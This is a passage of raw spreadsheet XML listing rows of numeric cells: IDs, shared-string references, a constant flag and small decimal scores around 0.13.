      <c r="F11650" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11651" ht="15.75" customHeight="1">
      <c r="A11651" s="1">
        <v>16115.0</v>
      </c>
      <c r="B11651" s="2">
        <v>4.5410384E7</v>
      </c>
      <c r="C11651" s="2" t="s">
        <v>11182</v>
      </c>
      <c r="D11651" s="2">
        <v>1.0</v>
      </c>
      <c r="E11651" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11651" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11652" ht="15.75" customHeight="1">
      <c r="A11652" s="1">
        <v>16934.0</v>
      </c>
      <c r="B11652" s="2">
        <v>4.8176505E7</v>
      </c>
      <c r="C11652" s="2" t="s">
        <v>11183</v>
      </c>
      <c r="D11652" s="2">
        <v>1.0</v>
      </c>
      <c r="E11652" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11652" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11653" ht="15.75" customHeight="1">
      <c r="A11653" s="1">
        <v>17071.0</v>
      </c>
      <c r="B11653" s="2">
        <v>4.8590108E7</v>
      </c>
      <c r="C11653" s="2" t="s">
        <v>11184</v>
      </c>
      <c r="D11653" s="2">
        <v>1.0</v>
      </c>
      <c r="E11653" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11653" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11654" ht="15.75" customHeight="1">
      <c r="A11654" s="1">
        <v>17117.0</v>
      </c>
      <c r="B11654" s="2">
        <v>4.8768194E7</v>
      </c>
      <c r="C11654" s="2" t="s">
        <v>11185</v>
      </c>
      <c r="D11654" s="2">
        <v>1.0</v>
      </c>
      <c r="E11654" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11654" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11655" ht="15.75" customHeight="1">
      <c r="A11655" s="1">
        <v>26480.0</v>
      </c>
      <c r="B11655" s="2">
        <v>1.7442472E7</v>
      </c>
      <c r="C11655" s="2" t="s">
        <v>11186</v>
      </c>
      <c r="D11655" s="2">
        <v>1.0</v>
      </c>
      <c r="E11655" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11655" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11656" ht="15.75" customHeight="1">
      <c r="A11656" s="1">
        <v>28356.0</v>
      </c>
      <c r="B11656" s="2">
        <v>2.5959249E7</v>
      </c>
      <c r="C11656" s="2" t="s">
        <v>11187</v>
      </c>
      <c r="D11656" s="2">
        <v>1.0</v>
      </c>
      <c r="E11656" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11656" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11657" ht="15.75" customHeight="1">
      <c r="A11657" s="1">
        <v>29943.0</v>
      </c>
      <c r="B11657" s="2">
        <v>3607504.0</v>
      </c>
      <c r="C11657" s="2" t="s">
        <v>11188</v>
      </c>
      <c r="D11657" s="2">
        <v>1.0</v>
      </c>
      <c r="E11657" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11657" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11658" ht="15.75" customHeight="1">
      <c r="A11658" s="1">
        <v>32465.0</v>
      </c>
      <c r="B11658" s="2">
        <v>5.6786502E7</v>
      </c>
      <c r="C11658" s="2" t="s">
        <v>11189</v>
      </c>
      <c r="D11658" s="2">
        <v>1.0</v>
      </c>
      <c r="E11658" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11658" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11659" ht="15.75" customHeight="1">
      <c r="A11659" s="1">
        <v>32850.0</v>
      </c>
      <c r="B11659" s="2">
        <v>6253507.0</v>
      </c>
      <c r="C11659" s="2" t="s">
        <v>11190</v>
      </c>
      <c r="D11659" s="2">
        <v>1.0</v>
      </c>
      <c r="E11659" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11659" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11660" ht="15.75" customHeight="1">
      <c r="A11660" s="1">
        <v>19494.0</v>
      </c>
      <c r="B11660" s="2">
        <v>5.5887296E7</v>
      </c>
      <c r="C11660" s="2" t="s">
        <v>11191</v>
      </c>
      <c r="D11660" s="2">
        <v>1.0</v>
      </c>
      <c r="E11660" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11660" s="2">
        <v>0.1337719298245614</v>
      </c>
    </row>
    <row r="11661" ht="15.75" customHeight="1">
      <c r="A11661" s="1">
        <v>18563.0</v>
      </c>
      <c r="B11661" s="2">
        <v>5.3187964E7</v>
      </c>
      <c r="C11661" s="2" t="s">
        <v>11192</v>
      </c>
      <c r="D11661" s="2">
        <v>1.0</v>
      </c>
      <c r="E11661" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11661" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="11662" ht="15.75" customHeight="1">
      <c r="A11662" s="1">
        <v>32711.0</v>
      </c>
      <c r="B11662" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C11662" s="2" t="s">
        <v>11193</v>
      </c>
      <c r="D11662" s="2">
        <v>1.0</v>
      </c>
      <c r="E11662" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11662" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="11663" ht="15.75" customHeight="1">
      <c r="A11663" s="1">
        <v>8066.0</v>
      </c>
      <c r="B11663" s="2">
        <v>5.2932293E7</v>
      </c>
      <c r="C11663" s="2" t="s">
        <v>11194</v>
      </c>
      <c r="D11663" s="2">
        <v>1.0</v>
      </c>
      <c r="E11663" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11663" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="11664" ht="15.75" customHeight="1">
      <c r="A11664" s="1">
        <v>24442.0</v>
      </c>
      <c r="B11664" s="2">
        <v>1.089644E7</v>
      </c>
      <c r="C11664" s="2" t="s">
        <v>11195</v>
      </c>
      <c r="D11664" s="2">
        <v>1.0</v>
      </c>
      <c r="E11664" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11664" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="11665" ht="15.75" customHeight="1">
      <c r="A11665" s="1">
        <v>28821.0</v>
      </c>
      <c r="B11665" s="2">
        <v>2.8787385E7</v>
      </c>
      <c r="C11665" s="2" t="s">
        <v>11196</v>
      </c>
      <c r="D11665" s="2">
        <v>1.0</v>
      </c>
      <c r="E11665" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11665" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="11666" ht="15.75" customHeight="1">
      <c r="A11666" s="1">
        <v>17133.0</v>
      </c>
      <c r="B11666" s="2">
        <v>4.8829481E7</v>
      </c>
      <c r="C11666" s="2" t="s">
        <v>11197</v>
      </c>
      <c r="D11666" s="2">
        <v>1.0</v>
      </c>
      <c r="E11666" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11666" s="2">
        <v>0.1334991708126037</v>
      </c>
    </row>
    <row r="11667" ht="15.75" customHeight="1">
      <c r="A11667" s="1">
        <v>14242.0</v>
      </c>
      <c r="B11667" s="2">
        <v>3.8326882E7</v>
      </c>
      <c r="C11667" s="2" t="s">
        <v>11198</v>
      </c>
      <c r="D11667" s="2">
        <v>1.0</v>
      </c>
      <c r="E11667" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11667" s="2">
        <v>0.133169934640523</v>
      </c>
    </row>
    <row r="11668" ht="15.75" customHeight="1">
      <c r="A11668" s="1">
        <v>12710.0</v>
      </c>
      <c r="B11668" s="2">
        <v>3.0831773E7</v>
      </c>
      <c r="C11668" s="2" t="s">
        <v>11199</v>
      </c>
      <c r="D11668" s="2">
        <v>1.0</v>
      </c>
      <c r="E11668" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11668" s="2">
        <v>0.1331699346405229</v>
      </c>
    </row>
    <row r="11669" ht="15.75" customHeight="1">
      <c r="A11669" s="1">
        <v>7179.0</v>
      </c>
      <c r="B11669" s="2">
        <v>5.0561618E7</v>
      </c>
      <c r="C11669" s="2" t="s">
        <v>11200</v>
      </c>
      <c r="D11669" s="2">
        <v>1.0</v>
      </c>
      <c r="E11669" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11669" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="11670" ht="15.75" customHeight="1">
      <c r="A11670" s="1">
        <v>1396.0</v>
      </c>
      <c r="B11670" s="2">
        <v>2.6274108E7</v>
      </c>
      <c r="C11670" s="2" t="s">
        <v>11201</v>
      </c>
      <c r="D11670" s="2">
        <v>1.0</v>
      </c>
      <c r="E11670" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11670" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11671" ht="15.75" customHeight="1">
      <c r="A11671" s="1">
        <v>3250.0</v>
      </c>
      <c r="B11671" s="2">
        <v>3.7386036E7</v>
      </c>
      <c r="C11671" s="2" t="s">
        <v>11202</v>
      </c>
      <c r="D11671" s="2">
        <v>1.0</v>
      </c>
      <c r="E11671" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11671" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11672" ht="15.75" customHeight="1">
      <c r="A11672" s="1">
        <v>8207.0</v>
      </c>
      <c r="B11672" s="2">
        <v>5.3306999E7</v>
      </c>
      <c r="C11672" s="2" t="s">
        <v>11203</v>
      </c>
      <c r="D11672" s="2">
        <v>1.0</v>
      </c>
      <c r="E11672" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11672" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11673" ht="15.75" customHeight="1">
      <c r="A11673" s="1">
        <v>8413.0</v>
      </c>
      <c r="B11673" s="2">
        <v>5.390067E7</v>
      </c>
      <c r="C11673" s="2" t="s">
        <v>11204</v>
      </c>
      <c r="D11673" s="2">
        <v>1.0</v>
      </c>
      <c r="E11673" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11673" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11674" ht="15.75" customHeight="1">
      <c r="A11674" s="1">
        <v>18720.0</v>
      </c>
      <c r="B11674" s="2">
        <v>5.3669348E7</v>
      </c>
      <c r="C11674" s="2" t="s">
        <v>11205</v>
      </c>
      <c r="D11674" s="2">
        <v>1.0</v>
      </c>
      <c r="E11674" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11674" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11675" ht="15.75" customHeight="1">
      <c r="A11675" s="1">
        <v>18797.0</v>
      </c>
      <c r="B11675" s="2">
        <v>5.3850269E7</v>
      </c>
      <c r="C11675" s="2" t="s">
        <v>11206</v>
      </c>
      <c r="D11675" s="2">
        <v>1.0</v>
      </c>
      <c r="E11675" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11675" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11676" ht="15.75" customHeight="1">
      <c r="A11676" s="1">
        <v>20613.0</v>
      </c>
      <c r="B11676" s="2">
        <v>1.3975282E7</v>
      </c>
      <c r="C11676" s="2" t="s">
        <v>11207</v>
      </c>
      <c r="D11676" s="2">
        <v>1.0</v>
      </c>
      <c r="E11676" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11676" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="11677" ht="15.75" customHeight="1">
      <c r="A11677" s="1">
        <v>19006.0</v>
      </c>
      <c r="B11677" s="2">
        <v>5.4478586E7</v>
      </c>
      <c r="C11677" s="2" t="s">
        <v>11208</v>
      </c>
      <c r="D11677" s="2">
        <v>1.0</v>
      </c>
      <c r="E11677" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11677" s="2">
        <v>0.1328502415458937</v>
      </c>
    </row>
    <row r="11678" ht="15.75" customHeight="1">
      <c r="A11678" s="1">
        <v>7074.0</v>
      </c>
      <c r="B11678" s="2">
        <v>5.0248684E7</v>
      </c>
      <c r="C11678" s="2" t="s">
        <v>11209</v>
      </c>
      <c r="D11678" s="2">
        <v>1.0</v>
      </c>
      <c r="E11678" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11678" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="11679" ht="15.75" customHeight="1">
      <c r="A11679" s="1">
        <v>4184.0</v>
      </c>
      <c r="B11679" s="2">
        <v>4.1567702E7</v>
      </c>
      <c r="C11679" s="2" t="s">
        <v>11210</v>
      </c>
      <c r="D11679" s="2">
        <v>1.0</v>
      </c>
      <c r="E11679" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11679" s="2">
        <v>0.1328125</v>
      </c>
    </row>
    <row r="11680" ht="15.75" customHeight="1">
      <c r="A11680" s="1">
        <v>11898.0</v>
      </c>
      <c r="B11680" s="2">
        <v>2.5172531E7</v>
      </c>
      <c r="C11680" s="2" t="s">
        <v>11211</v>
      </c>
      <c r="D11680" s="2">
        <v>1.0</v>
      </c>
      <c r="E11680" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11680" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="11681" ht="15.75" customHeight="1">
      <c r="A11681" s="1">
        <v>16582.0</v>
      </c>
      <c r="B11681" s="2">
        <v>4.6918342E7</v>
      </c>
      <c r="C11681" s="2" t="s">
        <v>11212</v>
      </c>
      <c r="D11681" s="2">
        <v>1.0</v>
      </c>
      <c r="E11681" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11681" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="11682" ht="15.75" customHeight="1">
      <c r="A11682" s="1">
        <v>32601.0</v>
      </c>
      <c r="B11682" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C11682" s="2" t="s">
        <v>11213</v>
      </c>
      <c r="D11682" s="2">
        <v>1.0</v>
      </c>
      <c r="E11682" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11682" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="11683" ht="15.75" customHeight="1">
      <c r="A11683" s="1">
        <v>1908.0</v>
      </c>
      <c r="B11683" s="2">
        <v>3.0000498E7</v>
      </c>
      <c r="C11683" s="2" t="s">
        <v>11214</v>
      </c>
      <c r="D11683" s="2">
        <v>1.0</v>
      </c>
      <c r="E11683" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11683" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11684" ht="15.75" customHeight="1">
      <c r="A11684" s="1">
        <v>2367.0</v>
      </c>
      <c r="B11684" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C11684" s="2" t="s">
        <v>11215</v>
      </c>
      <c r="D11684" s="2">
        <v>1.0</v>
      </c>
      <c r="E11684" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11684" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11685" ht="15.75" customHeight="1">
      <c r="A11685" s="1">
        <v>3471.0</v>
      </c>
      <c r="B11685" s="2">
        <v>3.8350464E7</v>
      </c>
      <c r="C11685" s="2" t="s">
        <v>11216</v>
      </c>
      <c r="D11685" s="2">
        <v>1.0</v>
      </c>
      <c r="E11685" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11685" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11686" ht="15.75" customHeight="1">
      <c r="A11686" s="1">
        <v>5195.0</v>
      </c>
      <c r="B11686" s="2">
        <v>4.483646E7</v>
      </c>
      <c r="C11686" s="2" t="s">
        <v>11217</v>
      </c>
      <c r="D11686" s="2">
        <v>1.0</v>
      </c>
      <c r="E11686" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11686" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11687" ht="15.75" customHeight="1">
      <c r="A11687" s="1">
        <v>5994.0</v>
      </c>
      <c r="B11687" s="2">
        <v>4.743396E7</v>
      </c>
      <c r="C11687" s="2" t="s">
        <v>11218</v>
      </c>
      <c r="D11687" s="2">
        <v>1.0</v>
      </c>
      <c r="E11687" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11687" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11688" ht="15.75" customHeight="1">
      <c r="A11688" s="1">
        <v>6005.0</v>
      </c>
      <c r="B11688" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C11688" s="2" t="s">
        <v>11219</v>
      </c>
      <c r="D11688" s="2">
        <v>1.0</v>
      </c>
      <c r="E11688" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11688" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11689" ht="15.75" customHeight="1">
      <c r="A11689" s="1">
        <v>7083.0</v>
      </c>
      <c r="B11689" s="2">
        <v>5.0271159E7</v>
      </c>
      <c r="C11689" s="2" t="s">
        <v>11220</v>
      </c>
      <c r="D11689" s="2">
        <v>1.0</v>
      </c>
      <c r="E11689" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11689" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11690" ht="15.75" customHeight="1">
      <c r="A11690" s="1">
        <v>7790.0</v>
      </c>
      <c r="B11690" s="2">
        <v>5.2201038E7</v>
      </c>
      <c r="C11690" s="2" t="s">
        <v>11221</v>
      </c>
      <c r="D11690" s="2">
        <v>1.0</v>
      </c>
      <c r="E11690" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11690" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11691" ht="15.75" customHeight="1">
      <c r="A11691" s="1">
        <v>8392.0</v>
      </c>
      <c r="B11691" s="2">
        <v>5.3848941E7</v>
      </c>
      <c r="C11691" s="2" t="s">
        <v>11222</v>
      </c>
      <c r="D11691" s="2">
        <v>1.0</v>
      </c>
      <c r="E11691" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11691" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11692" ht="15.75" customHeight="1">
      <c r="A11692" s="1">
        <v>9261.0</v>
      </c>
      <c r="B11692" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C11692" s="2" t="s">
        <v>11223</v>
      </c>
      <c r="D11692" s="2">
        <v>1.0</v>
      </c>
      <c r="E11692" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11692" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11693" ht="15.75" customHeight="1">
      <c r="A11693" s="1">
        <v>9264.0</v>
      </c>
      <c r="B11693" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C11693" s="2" t="s">
        <v>11224</v>
      </c>
      <c r="D11693" s="2">
        <v>1.0</v>
      </c>
      <c r="E11693" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11693" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11694" ht="15.75" customHeight="1">
      <c r="A11694" s="1">
        <v>9514.0</v>
      </c>
      <c r="B11694" s="2">
        <v>5.5965603E7</v>
      </c>
      <c r="C11694" s="2" t="s">
        <v>11225</v>
      </c>
      <c r="D11694" s="2">
        <v>1.0</v>
      </c>
      <c r="E11694" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11694" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11695" ht="15.75" customHeight="1">
      <c r="A11695" s="1">
        <v>9615.0</v>
      </c>
      <c r="B11695" s="2">
        <v>5.6188312E7</v>
      </c>
      <c r="C11695" s="2" t="s">
        <v>11226</v>
      </c>
      <c r="D11695" s="2">
        <v>1.0</v>
      </c>
      <c r="E11695" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11695" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11696" ht="15.75" customHeight="1">
      <c r="A11696" s="1">
        <v>14868.0</v>
      </c>
      <c r="B11696" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C11696" s="2" t="s">
        <v>11227</v>
      </c>
      <c r="D11696" s="2">
        <v>1.0</v>
      </c>
      <c r="E11696" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11696" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11697" ht="15.75" customHeight="1">
      <c r="A11697" s="1">
        <v>14869.0</v>
      </c>
      <c r="B11697" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C11697" s="2" t="s">
        <v>11228</v>
      </c>
      <c r="D11697" s="2">
        <v>1.0</v>
      </c>
      <c r="E11697" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11697" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11698" ht="15.75" customHeight="1">
      <c r="A11698" s="1">
        <v>15305.0</v>
      </c>
      <c r="B11698" s="2">
        <v>4.2479222E7</v>
      </c>
      <c r="C11698" s="2" t="s">
        <v>11229</v>
      </c>
      <c r="D11698" s="2">
        <v>1.0</v>
      </c>
      <c r="E11698" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11698" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11699" ht="15.75" customHeight="1">
      <c r="A11699" s="1">
        <v>16741.0</v>
      </c>
      <c r="B11699" s="2">
        <v>4.7549908E7</v>
      </c>
      <c r="C11699" s="2" t="s">
        <v>11230</v>
      </c>
      <c r="D11699" s="2">
        <v>1.0</v>
      </c>
      <c r="E11699" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11699" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11700" ht="15.75" customHeight="1">
      <c r="A11700" s="1">
        <v>17740.0</v>
      </c>
      <c r="B11700" s="2">
        <v>5.067815E7</v>
      </c>
      <c r="C11700" s="2" t="s">
        <v>11231</v>
      </c>
      <c r="D11700" s="2">
        <v>1.0</v>
      </c>
      <c r="E11700" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11700" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11701" ht="15.75" customHeight="1">
      <c r="A11701" s="1">
        <v>17832.0</v>
      </c>
      <c r="B11701" s="2">
        <v>5.0921976E7</v>
      </c>
      <c r="C11701" s="2" t="s">
        <v>11232</v>
      </c>
      <c r="D11701" s="2">
        <v>1.0</v>
      </c>
      <c r="E11701" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11701" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11702" ht="15.75" customHeight="1">
      <c r="A11702" s="1">
        <v>17909.0</v>
      </c>
      <c r="B11702" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C11702" s="2" t="s">
        <v>11233</v>
      </c>
      <c r="D11702" s="2">
        <v>1.0</v>
      </c>
      <c r="E11702" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11702" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11703" ht="15.75" customHeight="1">
      <c r="A11703" s="1">
        <v>18165.0</v>
      </c>
      <c r="B11703" s="2">
        <v>5.1918087E7</v>
      </c>
      <c r="C11703" s="2" t="s">
        <v>11234</v>
      </c>
      <c r="D11703" s="2">
        <v>1.0</v>
      </c>
      <c r="E11703" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11703" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11704" ht="15.75" customHeight="1">
      <c r="A11704" s="1">
        <v>18417.0</v>
      </c>
      <c r="B11704" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C11704" s="2" t="s">
        <v>11235</v>
      </c>
      <c r="D11704" s="2">
        <v>1.0</v>
      </c>
      <c r="E11704" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11704" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11705" ht="15.75" customHeight="1">
      <c r="A11705" s="1">
        <v>21689.0</v>
      </c>
      <c r="B11705" s="2">
        <v>2.5219338E7</v>
      </c>
      <c r="C11705" s="2" t="s">
        <v>11236</v>
      </c>
      <c r="D11705" s="2">
        <v>1.0</v>
      </c>
      <c r="E11705" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11705" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11706" ht="15.75" customHeight="1">
      <c r="A11706" s="1">
        <v>21778.0</v>
      </c>
      <c r="B11706" s="2">
        <v>2.6453715E7</v>
      </c>
      <c r="C11706" s="2" t="s">
        <v>11237</v>
      </c>
      <c r="D11706" s="2">
        <v>1.0</v>
      </c>
      <c r="E11706" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11706" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11707" ht="15.75" customHeight="1">
      <c r="A11707" s="1">
        <v>23931.0</v>
      </c>
      <c r="B11707" s="2">
        <v>8670568.0</v>
      </c>
      <c r="C11707" s="2" t="s">
        <v>11238</v>
      </c>
      <c r="D11707" s="2">
        <v>1.0</v>
      </c>
      <c r="E11707" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11707" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11708" ht="15.75" customHeight="1">
      <c r="A11708" s="1">
        <v>24519.0</v>
      </c>
      <c r="B11708" s="2">
        <v>1.1158689E7</v>
      </c>
      <c r="C11708" s="2" t="s">
        <v>11239</v>
      </c>
      <c r="D11708" s="2">
        <v>1.0</v>
      </c>
      <c r="E11708" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11708" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11709" ht="15.75" customHeight="1">
      <c r="A11709" s="1">
        <v>25847.0</v>
      </c>
      <c r="B11709" s="2">
        <v>1.4824583E7</v>
      </c>
      <c r="C11709" s="2" t="s">
        <v>11240</v>
      </c>
      <c r="D11709" s="2">
        <v>1.0</v>
      </c>
      <c r="E11709" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11709" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11710" ht="15.75" customHeight="1">
      <c r="A11710" s="1">
        <v>27063.0</v>
      </c>
      <c r="B11710" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C11710" s="2" t="s">
        <v>11241</v>
      </c>
      <c r="D11710" s="2">
        <v>1.0</v>
      </c>
      <c r="E11710" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11710" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11711" ht="15.75" customHeight="1">
      <c r="A11711" s="1">
        <v>27064.0</v>
      </c>
      <c r="B11711" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C11711" s="2" t="s">
        <v>11242</v>
      </c>
      <c r="D11711" s="2">
        <v>1.0</v>
      </c>
      <c r="E11711" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11711" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11712" ht="15.75" customHeight="1">
      <c r="A11712" s="1">
        <v>30590.0</v>
      </c>
      <c r="B11712" s="2">
        <v>4.1199834E7</v>
      </c>
      <c r="C11712" s="2" t="s">
        <v>11243</v>
      </c>
      <c r="D11712" s="2">
        <v>1.0</v>
      </c>
      <c r="E11712" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11712" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11713" ht="15.75" customHeight="1">
      <c r="A11713" s="1">
        <v>30628.0</v>
      </c>
      <c r="B11713" s="2">
        <v>4136218.0</v>
      </c>
      <c r="C11713" s="2" t="s">
        <v>11243</v>
      </c>
      <c r="D11713" s="2">
        <v>1.0</v>
      </c>
      <c r="E11713" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11713" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="11714" ht="15.75" customHeight="1">
      <c r="A11714" s="1">
        <v>4635.0</v>
      </c>
      <c r="B11714" s="2">
        <v>4.3004424E7</v>
      </c>
      <c r="C11714" s="2" t="s">
        <v>11244</v>
      </c>
      <c r="D11714" s="2">
        <v>1.0</v>
      </c>
      <c r="E11714" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11714" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="11715" ht="15.75" customHeight="1">
      <c r="A11715" s="1">
        <v>24089.0</v>
      </c>
      <c r="B11715" s="2">
        <v>9759390.0</v>
      </c>
      <c r="C11715" s="2" t="s">
        <v>11245</v>
      </c>
      <c r="D11715" s="2">
        <v>1.0</v>
      </c>
      <c r="E11715" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11715" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="11716" ht="15.75" customHeight="1">
      <c r="A11716" s="1">
        <v>6159.0</v>
      </c>
      <c r="B11716" s="2">
        <v>4.7872694E7</v>
      </c>
      <c r="C11716" s="2" t="s">
        <v>11246</v>
      </c>
      <c r="D11716" s="2">
        <v>1.0</v>
      </c>
      <c r="E11716" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11716" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="11717" ht="15.75" customHeight="1">
      <c r="A11717" s="1">
        <v>21770.0</v>
      </c>
      <c r="B11717" s="2">
        <v>2.6362953E7</v>
      </c>
      <c r="C11717" s="2" t="s">
        <v>11247</v>
      </c>
      <c r="D11717" s="2">
        <v>1.0</v>
      </c>
      <c r="E11717" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11717" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
